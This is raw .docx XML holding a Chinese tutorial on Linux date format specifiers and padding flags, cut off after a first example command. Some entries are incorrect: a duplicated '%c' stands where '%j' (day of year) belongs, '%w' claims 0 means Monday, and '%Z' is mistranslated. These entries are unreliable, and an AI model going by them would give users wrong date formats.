    <w:p w14:paraId="45F9D8C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %b    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>的月名缩写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：一，代表一月</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDE652" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %B    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>的月名全称</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：一月</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537988B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %c    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>的日期和时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：</w:t>
      </w:r>
      <w:r>
        <w:t>2005</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>星期四</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 23:05:25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EC5C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %C    </w:t>
      </w:r>
      <w:r>
        <w:t>世纪；比如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %Y</w:t>
      </w:r>
      <w:r>
        <w:t>，通常为省略当前年份的后两位数字</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327608FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %d    </w:t>
      </w:r>
      <w:r>
        <w:t>按月计的日期</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75436D1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %D    </w:t>
      </w:r>
      <w:r>
        <w:t>按月计的日期；等于</w:t>
      </w:r>
      <w:r>
        <w:t>%m/%d/%y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BDA28A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %e    </w:t>
      </w:r>
      <w:r>
        <w:t>按月计的日期，添加空格，等于</w:t>
      </w:r>
      <w:r>
        <w:t>%_d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24115A2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  %F    </w:t>
      </w:r>
      <w:r>
        <w:t>完整日期格式，等价于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %Y-%m-%d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD6C94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %g    ISO-8601 </w:t>
      </w:r>
      <w:r>
        <w:t>格式年份的最后两位</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>%G)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB49C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %G    ISO-8601 </w:t>
      </w:r>
      <w:r>
        <w:t>格式年份</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>%V)</w:t>
      </w:r>
      <w:r>
        <w:t>，一般只和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %V </w:t>
      </w:r>
      <w:r>
        <w:t>结合使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34491860" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %h    </w:t>
      </w:r>
      <w:r>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:t>%b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338FB9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %H    </w:t>
      </w:r>
      <w:r>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:t>(00-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C195641" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %I    </w:t>
      </w:r>
      <w:r>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:t>(00-12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230ED9A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %c    </w:t>
      </w:r>
      <w:r>
        <w:t>按年计的日期</w:t>
      </w:r>
      <w:r>
        <w:t>(001-366)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC08DA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %k    </w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:t>(0-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7506D2B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %l    </w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:t>(1-12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CDFC1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %m    </w:t>
      </w:r>
      <w:r>
        <w:t>月份</w:t>
      </w:r>
      <w:r>
        <w:t>(01-12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DAB57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %M    </w:t>
      </w:r>
      <w:r>
        <w:t>分</w:t>
      </w:r>
      <w:r>
        <w:t>(00-59)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB31B66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %n    </w:t>
      </w:r>
      <w:r>
        <w:t>换行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2ED606" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %N    </w:t>
      </w:r>
      <w:r>
        <w:t>纳秒</w:t>
      </w:r>
      <w:r>
        <w:t>(000000000-999999999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D55FFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %p    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>上午</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>下午</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>，未知时输出为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFAB59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %P    </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%p </w:t>
      </w:r>
      <w:r>
        <w:t>类似，但是输出小写字母</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED51A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %r    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:t>小时时钟时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">11:11:04 </w:t>
      </w:r>
      <w:r>
        <w:t>下午</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61F864" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %R    24 </w:t>
      </w:r>
      <w:r>
        <w:t>小时时间的时和分，等价于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %H:%M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282D8E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %s    </w:t>
      </w:r>
      <w:r>
        <w:t>自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UTC </w:t>
      </w:r>
      <w:r>
        <w:t>时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1970-01-01 00:00:00 </w:t>
      </w:r>
      <w:r>
        <w:t>以来所经过的秒数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C75E06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %S    </w:t>
      </w:r>
      <w:r>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:t>(00-60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6ED2B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %t    </w:t>
      </w:r>
      <w:r>
        <w:t>输出制表符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759580DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %T    </w:t>
      </w:r>
      <w:r>
        <w:t>时间，等于</w:t>
      </w:r>
      <w:r>
        <w:t>%H:%M:%S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D2003" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %u    </w:t>
      </w:r>
      <w:r>
        <w:t>星期，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>代表星期一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241CD75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %U    </w:t>
      </w:r>
      <w:r>
        <w:t>一年中的第几周，以周日为每星期第一天</w:t>
      </w:r>
      <w:r>
        <w:t>(00-53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173EE73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %V    ISO-8601 </w:t>
      </w:r>
      <w:r>
        <w:t>格式规范下的一年中第几周，以周一为每星期第一天</w:t>
      </w:r>
      <w:r>
        <w:t>(01-53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F8FD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %w    </w:t>
      </w:r>
      <w:r>
        <w:t>一星期中的第几日</w:t>
      </w:r>
      <w:r>
        <w:t>(0-6)</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r>
        <w:t>代表周一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198CF6D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %W    </w:t>
      </w:r>
      <w:r>
        <w:t>一年中的第几周，以周一为每星期第一天</w:t>
      </w:r>
      <w:r>
        <w:t>(00-53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5FBCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %x    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>下的日期描述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：</w:t>
      </w:r>
      <w:r>
        <w:t>12/31/99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9F10B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %X    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>下的时间描述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：</w:t>
      </w:r>
      <w:r>
        <w:t>23:13:48)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0F95B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %y    </w:t>
      </w:r>
      <w:r>
        <w:t>年份最后两位数位</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (00-99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118AE10B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %Y    </w:t>
      </w:r>
      <w:r>
        <w:t>年份</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E81354" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %z +hhmm              </w:t>
      </w:r>
      <w:r>
        <w:t>数字时区</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:t>-0400)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A3710" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %:z +hh:mm            </w:t>
      </w:r>
      <w:r>
        <w:t>数字时区</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:t>-04:00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F2777" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %::z +hh:mm:ss        </w:t>
      </w:r>
      <w:r>
        <w:t>数字时区</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:t>-04:00:00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A0B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %:::z                 </w:t>
      </w:r>
      <w:r>
        <w:t>数字时区带有必要的精度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:t>-04</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>+05:30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53160122" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %Z                    </w:t>
      </w:r>
      <w:r>
        <w:t>按字母表排序的时区缩写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:t>EDT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3664B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C1D75B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>默认情况下，日期的数字区域以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r>
        <w:t>填充。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F9DF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>以下可选标记可以跟在</w:t>
      </w:r>
      <w:r>
        <w:t>"%"</w:t>
      </w:r>
      <w:r>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BF9C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19791F9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - (</w:t>
      </w:r>
      <w:r>
        <w:t>连字符</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>不填充该域</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE4384" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  _ (</w:t>
      </w:r>
      <w:r>
        <w:t>下划线</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>以空格填充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31005C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  0 (</w:t>
      </w:r>
      <w:r>
        <w:t>数字</w:t>
      </w:r>
      <w:r>
        <w:t>0)</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r>
        <w:t>填充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7A85B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ^ </w:t>
      </w:r>
      <w:r>
        <w:t>如果可能，使用大写字母</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78328A37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  # </w:t>
      </w:r>
      <w:r>
        <w:t>如果可能，使用相反的大小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ED540B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBE11C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在任何标记之后还允许一个可选的域宽度指定，它是一个十进制数字。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BCA25C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>作为一个可选的修饰声明，它可以是</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>，在可能的情况下使用本地环境关联的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD7D8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>表示方式；或者是</w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>，在可能的情况下使用本地环境关联的数字符号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB6C47F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719D0530" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD0676" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>系统里自带的一个系统命令，用来显示当前的系统时间，不过默认显示的结果里包括很多信息，特别是做为文件名输出时，不是很方便</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4DB8CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>好在</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>命令里包含格式化输出的选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B78BCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517B36ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@root ~]# date "+%Y-%m-%d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF6FACF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
